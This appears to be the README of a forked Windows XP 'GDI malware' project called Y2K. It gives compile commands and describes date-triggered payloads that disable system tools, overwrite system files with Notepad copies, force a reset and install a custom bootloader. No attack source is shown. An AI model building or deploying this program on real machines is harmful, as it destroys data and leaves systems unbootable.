Windows XP GDI malware created by Jotaxisz
README.org

Y2K GDI Malware

A fork of malware created by Jotaxisz with a reworked source structure (minor changes).

To run this malware you need a Windows XP machine with the date set to <2000-01-01 Sat> or <2000-01-02 Sun>; the date selects the payload.

Building

On Linux

You will need MinGW and Make. You can pass the variable CXX to change the C++ compiler (the default is i686-w64-mingw-g++) and WINDRES to change the windres command (the default is i686-w64-mingw-windres). Other variables are NASM and LD for changing the nasm and ld commands. You can set CXX, WINDRES and LD to x86_64-w64-mingw-g++, x86_64-w64-mingw-windres and x86_64-w64-mingw32-ld respectively to build it natively for 64-bit environments.

Arch linux:

pacman -S make mingw-w64 nasm
make

Ubuntu

apt install make mingw-w64 nasm
make

You can also run make clean to remove the bin/ folder, the .o files in res/, and the .bin and .o files in mbr/.

On Windows

You will need to install MinGW (or another C++ compiler) and NASM. Then run the commands:

windres -o res\resource.o res\resource.rc
nasm -o mbr\bootloader.bin mbr\bootloader.asm
ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin
g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K

Bootloader

This project has a void function in its namespace called byeByeBoot; this function loads the custom bootloader code and writes it to the EFI partition. The source code of the binary can be found here.

Payloads

Whatever the date, executing the malware always disables the Task Manager, CMD, Execute and Power Options.

<2000-01-01 Sat>

This payload plays res/alarm.wav, then starts the GDI part and replaces multiple system files with copies of the Notepad executable. After the visual payload ends, the machine is forcibly reset and the bootloader payload starts.

<2000-01-02 Sun>

This payload plays res/jeff_syndicate_hip_hop.wav.